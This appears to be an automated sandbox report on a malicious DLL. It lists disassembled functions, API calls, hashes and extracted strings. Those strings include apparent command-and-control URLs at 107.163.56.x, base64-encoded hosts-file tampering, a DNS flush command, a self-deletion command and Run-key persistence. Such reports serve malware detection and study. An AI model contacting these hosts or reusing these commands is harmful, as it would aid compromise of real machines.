                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: c5dc9b721b54175916c357d909f3d1dbecb839da25cfc785ff06387120204b24
                                                                                                                                                                          • Instruction ID: 93a0378a6ccf2f7f519dd23e519065d15f3c4302ed09a0acca3509da98e3dc9f
                                                                                                                                                                          • Opcode Fuzzy Hash: c5dc9b721b54175916c357d909f3d1dbecb839da25cfc785ff06387120204b24
                                                                                                                                                                          • Instruction Fuzzy Hash: 3CF0366229E3C26EE31287285841BD6FF956B76314F0CCBCDB1D81B283C1E58498C7B6
                                                                                                                                                                          Function 10006F01 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 174sleepfileCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • Sleep.KERNEL32(0000EA60), ref: 10006F47
                                                                                                                                                                          • Sleep.KERNEL32 ref: 1000707C
                                                                                                                                                                          • wsprintfA.USER32 ref: 100070C0
                                                                                                                                                                          • PrintFile.2JSGOLBNYM(00000000,?,00000000), ref: 100070F9
                                                                                                                                                                          • PrintFile.2JSGOLBNYM(00000000,?,00000000,?,00000000), ref: 1000710C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FilePrintSleep$wsprintf
                                                                                                                                                                          • String ID: QVNEU3ZjLmV4ZQ==$XGRyaXZlcnNcZXRjXGhvc3Rz$XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==$c:\1.txt$http://107.163.56.232:18963/main.php$iOffset
                                                                                                                                                                          • API String ID: 1547040302-3558339448
                                                                                                                                                                          • Opcode ID: 898088f43af6ae26a71cb29de304709aace19cb9a3dbecf7e56f820a126de524
                                                                                                                                                                          • Instruction ID: fb61bf4e8c3f987df104399158fbbd5fa82b7bd29b5b13544636659ff5ce8687
                                                                                                                                                                          • Opcode Fuzzy Hash: 898088f43af6ae26a71cb29de304709aace19cb9a3dbecf7e56f820a126de524
                                                                                                                                                                          • Instruction Fuzzy Hash: 7551D8B6D04359BAF721D764CC55FCE77ACEB08381F2045A1F208AA086DA75BB808E51
                                                                                                                                                                          Function 10004921 Relevance: 17.8, APIs: 4, Strings: 6, Instructions: 337networksleepCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • socket.WS2_32(00000002,00000002,00000000,?,?,00000202,?), ref: 1000499C
                                                                                                                                                                          • socket.WS2_32(00000002,00000002,00000000), ref: 100049A4
                                                                                                                                                                          • Sleep.KERNEL32(?,00000000,00000001,00000000,00000000,?), ref: 10004A3A
                                                                                                                                                                          • wsprintfA.USER32 ref: 10004ADB
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: socket$Sleepwsprintf
                                                                                                                                                                          • String ID: %s|$127.0.0.1$8.8.8.8$ahnlab$alyac$v3lite
                                                                                                                                                                          • API String ID: 4031334902-4002687564
                                                                                                                                                                          • Opcode ID: a59fa5bbbfeca0813ebf207540be2f8e1c24db24c18423e471c4f08bbbb05ee2
                                                                                                                                                                          • Instruction ID: 59076712db6477dadbaa6102d4b2767c56af3142dc1d583c19f1c191fca588aa
                                                                                                                                                                          • Opcode Fuzzy Hash: a59fa5bbbfeca0813ebf207540be2f8e1c24db24c18423e471c4f08bbbb05ee2
                                                                                                                                                                          • Instruction Fuzzy Hash: 97B16CB2D0025CAAEB11DBE4CC85EDFBBBCEB45740F0045A6F205A6141EA71AB45CF61
                                                                                                                                                                          Function 100064AB Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 271timeCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • wsprintfA.USER32 ref: 10006509
                                                                                                                                                                            • Part of subcall function 10003F0A: InternetOpenA.WININET(7A4A585A,30564758,6C773159,6A567959,754D574A), ref: 10003F1C
                                                                                                                                                                          • ___crtGetTimeFormatEx.LIBCMT ref: 10006558
                                                                                                                                                                            • Part of subcall function 10003F24: InternetOpenUrlA.WININET(326C6D63,7A4A585A,30564758,6C773159,6A567959,754D574A), ref: 10003F39
                                                                                                                                                                            • Part of subcall function 10003F41: InternetReadFile.WININET(?,?,?,?), ref: 10003F51
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,10017BAC,10017BAC,00000000,00000000), ref: 100065DA
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,?,?,?,10017BAC,10017BAC,00000000,00000000), ref: 100065F8
                                                                                                                                                                          • wsprintfA.USER32 ref: 100066FB
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Internet$ByteCharMultiOpenWidewsprintf$FileFormatReadTime___crt
                                                                                                                                                                          • String ID: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)$aHR0cDovL2Jsb2cuc2luYS5jb20uY24vdS8lcw==$title
                                                                                                                                                                          • API String ID: 4077377486-2496724313
                                                                                                                                                                          • Opcode ID: 30b6c4eb74d26aae1e33478bdec11719f230f0eca2c191a5ba9ed9b3b2fc44f4
                                                                                                                                                                          • Instruction ID: 293d0e7632e531392dd0fb5c2f77952c0a17312896667c4884a995f19a9271bc
                                                                                                                                                                          • Opcode Fuzzy Hash: 30b6c4eb74d26aae1e33478bdec11719f230f0eca2c191a5ba9ed9b3b2fc44f4
                                                                                                                                                                          • Instruction Fuzzy Hash: 2C81D6B6C04249BEFB01DBA4DC81EEF7B7DEF09394F244166F505A6186DA316E4087B1
                                                                                                                                                                          Function 10005DC6 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 113timeCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • ___crtGetTimeFormatEx.LIBCMT ref: 10005E23
                                                                                                                                                                            • Part of subcall function 1000409D: RegQueryValueExA.KERNEL32(000000C8,00000004,?,?,?,?,-00000018,10005E28,?,ProcessorNameString,00000000,00000004,-00000298,-00000020,80000002,-00000094), ref: 100040B2
                                                                                                                                                                            • Part of subcall function 10004092: RegCloseKey.KERNEL32(?,10005E30,?,?,ProcessorNameString,00000000,00000004,-00000298,-00000020,80000002,-00000094,00000000,000F003F,-0000001C,00000000,00000000), ref: 10004096
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseFormatQueryTimeValue___crt
                                                                                                                                                                          • String ID: %u MB$12091507$@$Find CPU Error$HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString$http://107.163.56.232:18963/main.php
                                                                                                                                                                          • API String ID: 271660946-2089455369
                                                                                                                                                                          • Opcode ID: 95e223ab5f4cfbec46ff1c7f404cd97cebc2f8f8b6b247623b971e73518f697e
                                                                                                                                                                          • Instruction ID: c0ffa68043a95791f02fd04d8c4918fc6d3fd57fe225104bb55dd78593dce371
                                                                                                                                                                          • Opcode Fuzzy Hash: 95e223ab5f4cfbec46ff1c7f404cd97cebc2f8f8b6b247623b971e73518f697e
                                                                                                                                                                          • Instruction Fuzzy Hash: CB31C3B680460DBAEB11CB60DC46FDF77ACEF04351F54406AF644AB182EB35BB448B95
                                                                                                                                                                          Function 10006D1A Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 72timeCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 10003FF7: GetShortPathNameA.KERNEL32(?,?,?), ref: 10004003
                                                                                                                                                                            • Part of subcall function 1000406C: RegCreateKeyExA.KERNEL32(?,00000000,000F003F,00000000,?,00000000,00000000,80000001,10006D83,?,10006D83,80000001,00000000,00000000,REG_SZ,00000000), ref: 1000408A
                                                                                                                                                                          • wsprintfA.USER32 ref: 10006DAB
                                                                                                                                                                          • ___crtGetTimeFormatEx.LIBCMT ref: 10006DD1
                                                                                                                                                                            • Part of subcall function 100040D4: RegSetValueExA.KERNEL32(00000001,?,00000001,00000000,?,?,?,10006DD6,?,COAPI,00000000,00000001,?,00000001,?), ref: 100040E9
                                                                                                                                                                            • Part of subcall function 10004092: RegCloseKey.KERNEL32(?,10005E30,?,?,ProcessorNameString,00000000,00000004,-00000298,-00000020,80000002,-00000094,00000000,000F003F,-0000001C,00000000,00000000), ref: 10004096
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseCreateFormatNamePathShortTimeValue___crtwsprintf
                                                                                                                                                                          • String ID: %s "%s",ClassObject$C:\Users\user\Desktop\2JSGOlbNym.dll$C:\Windows\SysWOW64\rundll32.exe$COAPI$REG_SZ$U29mdHdhcmVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXFJ1bg==
                                                                                                                                                                          • API String ID: 1762869224-3236236931
                                                                                                                                                                          • Opcode ID: 4aa4fa9911ad6ed0aada2bf2cab57b1def2feffca7de209d23984a2ffb3f1acb
                                                                                                                                                                          • Instruction ID: 1af9319de0d48fb467b647ae3650b89cedd961ef50c791020d1a6b5894edbf87
                                                                                                                                                                          • Opcode Fuzzy Hash: 4aa4fa9911ad6ed0aada2bf2cab57b1def2feffca7de209d23984a2ffb3f1acb
                                                                                                                                                                          • Instruction Fuzzy Hash: BA11B2B694411CBEFB11D3A4DC86FEA776CDB14380F1004A1F744B9085EAB16FC88AA4
                                                                                                                                                                          Function 1000828F Relevance: 12.1, APIs: 2, Strings: 6, Instructions: 144sleepCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          • XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==, xrefs: 100082FF
                                                                                                                                                                          • Y21kLmV4ZSAvYyBpcGNvbmZpZyAvZmx1c2hkbnM=, xrefs: 10008428
                                                                                                                                                                          • 127.0.0.1, xrefs: 10008417
                                                                                                                                                                          • http://107.163.56.232:18963/main.php, xrefs: 10008376
                                                                                                                                                                          • 8.8.8.8, xrefs: 10008412
                                                                                                                                                                          • XGRyaXZlcnNcZXRjXGhvc3Rz, xrefs: 100082E8
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Sleepwsprintf
                                                                                                                                                                          • String ID: 127.0.0.1$8.8.8.8$XGRyaXZlcnNcZXRjXGhvc3Rz$XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==$Y21kLmV4ZSAvYyBpcGNvbmZpZyAvZmx1c2hkbnM=$http://107.163.56.232:18963/main.php
                                                                                                                                                                          • API String ID: 1749205058-515792873
                                                                                                                                                                          • Opcode ID: 68afc056b33bcdb1f7da1f58a41a9ab65b355f835620a2773ec6d1c511e6fed6
                                                                                                                                                                          • Instruction ID: 8dd24be72779d1db326892d4824c811f5291eb1f4f1f793922e2c79d5d000f77
                                                                                                                                                                          • Opcode Fuzzy Hash: 68afc056b33bcdb1f7da1f58a41a9ab65b355f835620a2773ec6d1c511e6fed6
                                                                                                                                                                          • Instruction Fuzzy Hash: A44109B6D0425976FB21D364CC56FCF7B6CEB44280F2045A5F248BA086DAB4AB844F55
                                                                                                                                                                          Function 1002875F Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 92sleepCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • wsprintfA.USER32 ref: 10008847
                                                                                                                                                                          • Sleep.KERNEL32(000007D0,?,?,00000000), ref: 10008868
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Sleepwsprintf
                                                                                                                                                                          • String ID: 7$C:\Users\user\Desktop$SK$SeDebugPrivilege$Y21kLmV4ZSAvYyBwaW5nIDEyNy4wLjAuMSAtbiAzJnJkIC9zIC9xICIlcyI=
                                                                                                                                                                          • API String ID: 1749205058-2043548083
                                                                                                                                                                          • Opcode ID: fd8cb615bc2a7434289248c0f4e9c720ce73c8ad7ac403d798c885ad5689031d
                                                                                                                                                                          • Instruction ID: 71c666905a5763b167ab1a21182f42240e287b7e11d47a96cc59b11d17f26c76
                                                                                                                                                                          • Opcode Fuzzy Hash: fd8cb615bc2a7434289248c0f4e9c720ce73c8ad7ac403d798c885ad5689031d
                                                                                                                                                                          • Instruction Fuzzy Hash: 4731F571408284AED712EB10DC8669E7FA6EF84385F50886DFAC85B112C770A9A49B53
                                                                                                                                                                          Function 1000858A Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 83sleepCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Sleep$wsprintf
                                                                                                                                                                          • String ID: D$aHR0cDovLzEwNy4xNjMuNTYuMTEwOjE4NTMwL3UxMTI5Lmh0bWw=$c:\%d.log
                                                                                                                                                                          • API String ID: 3195947292-1533272838
                                                                                                                                                                          • Opcode ID: a1878e512939dc9aed6c6a2808bc6b3174a4810047bc271b34a995d0e4e84be8
                                                                                                                                                                          • Instruction ID: acd8b216c9490be150f41627fddde4231ced29d76843988cf1697fe551d5a772
